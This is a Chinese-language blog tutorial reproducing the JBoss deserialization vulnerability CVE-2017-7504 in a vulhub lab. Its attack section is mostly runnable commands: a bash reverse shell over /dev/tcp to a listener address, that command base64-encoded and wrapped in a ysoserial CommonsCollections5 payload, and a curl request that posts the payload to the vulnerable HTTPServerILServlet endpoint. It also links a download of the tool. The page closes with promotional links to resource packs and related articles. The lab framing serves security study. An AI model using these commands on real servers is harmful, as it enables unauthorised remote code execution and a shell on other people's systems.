中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)

于 2024-08-17 13:00:00 发布
阅读量259 收藏 6
点赞数 9
文章标签: 中间件 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/A_991128a/article/details/141218696
版权

中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)

JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其

doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。

目录:

中间件安全:JBoss 反序列化命令执行漏洞.(CVE-2017-7504)

漏洞靶场:

靶场准备:Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客

漏洞测试:

第一步:访问存在的漏洞 URL 链接.

第二步:使用 Base64 编码,把 需要映射连接的代码 进行编码.

第三步:使用 工具 把代码生成一个可上传的文件.

第四步:监听的主机进行监听(我这里是 172.16.10.136 主机,监听端口是 5566 和编码一样就行.)

第五步:把生成的文件上传到存在漏洞的页面就行,监听主机那边就会返回对方的命令页面.

常用的默认端口:1098,1099,4444,4445,8080,8009,8083,8093 

受影响系统及应用版本    Jboss AS 5.x、Jboss AS 6.x

漏洞靶场:

靶场准备:[Web安全:iwebsec || vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-

CSDN博客](https://tianyuk.blog.csdn.net/article/details/130341391 “Web安全:iwebsec
|| vulhub 靶场搭建.(各种漏洞环境集合,一键搭建漏洞测试靶场)_iwebsec靶场-CSDN博客”)

​
cd vulhub/jboss/CVE-2017-7504        // 切换到漏洞目录.

docker-compose up -d                  // 开启漏洞靶场.


http://172.16.10.11:8080

# 访问开启服务的IP地址:8080

漏洞测试:

第一步:访问存在的漏洞 URL 链接.
http://172.16.10.11:8080/jbossmq-httpil/HTTPServerILServlet

http://漏洞的IP地址:端口/jbossmq-httpil/HTTPServerILServlet    # 后面的是存在漏洞的页面.

第二步:使用 Base64 编码,把 需要映射连接的代码 进行编码.
bash -i >& /dev/tcp/172.16.10.136/5566 0>&1

bash -i >& /dev/tcp/监听主机的IP地址(kali)/监听端口 0>&1

第三步:使用 工具 把代码生成一个可上传的文件.
工具链接:

链接:https://pan.baidu.com/s/11_V9awYc1qnTpG3JIDPwYQ 

提取码:tian


java -jar ysoserial-master-30099844c6-1.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTM2OjU1NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" > poc.ser


YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTM2OjU1NjYgMD4mMQ==    
#这个就是上面的 需要映射连接的代码 进行了编码,别的IP则进行别的编码就行.

第四步:监听的主机进行监听(我这里是 172.16.10.136 主机,监听端口是 5566 和编码一样就行.)

第五步:把生成的文件上传到存在漏洞的页面就行,监听主机那边就会返回对方的命令页面.
curl http://172.16.10.11:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

curl http://目标IP地址/端口/jbossmq-httpil/HTTPServerILServlet --data-binary 上传这个文件.

最后

从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。

因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。

干货主要有:

①1000+CTF历届题库(主流和经典的应该都有了)

②CTF技术文档(最全中文版)

③项目源码(四五十个有趣且经典的练手项目及源码)

④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)

⑤ 网络安全学习路线图(告别不入流的学习)

⑥ CTF/渗透测试工具镜像文件大全

⑦ 2023密码学/隐身术/PWN技术手册大全

如果你对网络安全入门感兴趣,那么你需要的话可以点击这里👉网络安全重磅福利:入门&进阶全套282G学习资源包免费分享!

扫码领取

教IT的小王A
关注
  • 9
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具
07-23
JBossMQJMS 反序列化漏洞CVE-2017-7504漏洞利用工具,方便我们进行漏洞利用getshell。
JBoss漏洞 - CVE-2017-7504
HAKUNAMATATATTA的博客
12-14 2417
JBoss AS 4.x 及之前版本中, JbossMQ 实现过程的 JMS over HTTP Invocation Layer 的HTTPServerILServlet.java 文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。CVE-2017-7504 漏洞CVE-2015-7501 的漏洞原理相似,只是利用的路径稍微出现了变化, CVE-2017-7504 出现在 /jbossmq-httpil/HTTPServerILServlet 路径下。
CVE-2017-12149 复现及修复
weixin_46580614的博客
07-24 5789
CVE-2017-12149 复现及修复 漏洞名称:JBOOS AS 6.X 反序列化漏洞 CVE编号:CVE-2017-12149 漏洞等级:高危 影响版本:5.x和6.x版本 漏洞描述及原理:2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致
JbossCVE-2017-12149)反序列化命令执行漏洞
weixin_51151498的博客
12-11 2245
JbossCVE-2017-12149)反序列化命令执行漏洞
Jboss Application Server反序列化命令执行漏洞利用工具(CVE-2017-12149)
07-23
2017年,它被发现存在一个严重的安全漏洞,被称为CVE-2017-12149,这是一个反序列化漏洞,允许远程攻击者通过精心构造的输入来执行任意系统命令,从而对受影响的系统造成严重威胁。 反序列化是将已序列化的对象...
CVE-2017-12149JBOSSas6.X反序列化(反弹shell版)
08-08
CVE-2017-12149是一个针对JBOSS Application Server 6.x版本的严重安全漏洞,它涉及到了Java对象的反序列化过程。在Java中,反序列化是将之前序列化的对象状态恢复到可操作的Java对象的过程。然而,如果这个过程没有...
jboss-logging-3.4.1.Final-API文档-中文版.zip
06-06
赠送jar包:jboss-logging-3.4.1.Final.jar; 赠送原API文档:jboss-logging-3.4.1.Final-javadoc.jar; 赠送源代码:jboss-logging-3.4.1.Final-sources.jar; 赠送Maven依赖信息文件:jboss-logging-3.4.1.Final....
jboss-logging-3.4.3.Final-API文档-中文版.zip
05-09
赠送jar包:jboss-logging-3.4.3.Final.jar; 赠送原API文档:jboss-logging-3.4.3.Final-javadoc.jar; 赠送源代码:jboss-logging-3.4.3.Final-sources.jar; 赠送Maven依赖信息文件:jboss-logging-3.4.3.Final....
JBOSS反序列化漏洞
weixin_52206305的博客
07-05 3916
Red Hat JBoss Application Server 是一款基于JavaEE的开源应用服务器。 经典的JBoss反序列化漏洞JBoss在请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。访问http://ip+端口/invoker/JMXInvokerServlet 如果出现下载提示框,就证明可能存在漏洞。该漏洞出现在请求中访问http://ip+端口/如果出现该页面就表示可能存在漏洞漏洞出现在/invoker/rea
CVE-2017-7504漏洞复现
Foreverlove112的博客
10-01 600
CVE-2017-7504漏洞复现
JBoss漏洞 - CVE-2017-12149
HAKUNAMATATATTA的博客
12-14 1662
JBOSSApplication Server 反序列化命令执行漏洞(CVE-2017-12149),远程攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危(High)。该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞
vulhub之jboss(CVE-2017-7504)
最新发布
weixin_56306210的博客
05-07 504
vulhub之jboss(CVE-2017-7504)
[Vulfocus解题系列] jboss 反序列化CVE-2017-7504
00勇士王子的博客
07-11 1087
漏洞介绍 名称: jboss 反序列化CVE-2017-7504) 描述: Red Hat JBoss Application Server(AS,也称WildFly)是美国红帽(Red Hat)公司的一款基于JavaEE的开源的应用服务器,它具有启动超快、轻量、模块化设计、热部署和并行部署、简洁管理、域管理及第一类元件等特性。 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件
中间件安全JBoss 反序列化命令执行漏洞.(CVE-2017-12149)
网络安全领域___专研者.
11-28 682
JBoss 反序列化漏洞,该漏洞位于 JBoss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中,其 doFilter 方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致恶意访问者通过精心设计的序列化数据执行任意代码。
JBoss反序列化
Massimo__JAVA的博客
07-15 529
jBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可, 可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、 EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。
Jboss反序列化漏洞的复现与原理
LJH1999ZN的博客
03-29 4959
一、什么是Jboss Jboss是一个基于J2EE的开放源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 Jboss属于redhat公司,而且jboss是开源的,免费的,且在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器,所以曾经广为流行。 二、Jboss的历史漏洞 1.jboss反序列化漏洞CVE-2017-7504 漏洞存在/jbossmq-httpi
Jboss反序列化远程代码执行漏洞CVE-2017-12149)
weixin_46411728的博客
08-28 1724
Jboss反序列化远程代码执行漏洞CVE-2017-12149)
jboss/CVE-2017-7504
不知名白帽的博客
06-23 2137
jboss/CVE-2017-7504漏洞复现。
CVE-2017-7504
07-28
CVE-2017-7504是指JBoss AS 4.x及之前版本中的一个反序列化漏洞,该漏洞存在于JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件中。攻击者可以利用特制的序列化数据利用该漏洞执行任意代码。与CVE-2015-7501漏洞原理相似,但利用的路径不同,CVE-2017-7504出现在/jbossmq-httpil/HTTPServerILServlet路径下。\[1\] 要利用CVE-2017-7504漏洞,可以按照以下步骤进行操作: 1. 访问靶场环境。 2. 使用CVE-2017-12149的工具和脚本在攻击机上执行命令,生成poc(详情请参考相关文章)\[2\]。 3. 在另一个终端上监听端口。 4. 在第一个终端上执行命令,生成成功\[3\]。 请注意,这只是一种利用CVE-2017-7504漏洞的方法,具体操作可能因环境和工具而异。 #### 引用[.reference_title] - *1* [JBossMQ JMS 反序列化漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_51151498/article/details/128283378)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [[Vulfocus解题系列] jboss 反序列化CVE-2017-7504)](https://blog.csdn.net/qq_45813980/article/details/118653639)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [JBoss反序列漏洞CVE-2017-7504)](https://blog.csdn.net/weixin_46411728/article/details/126714312)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值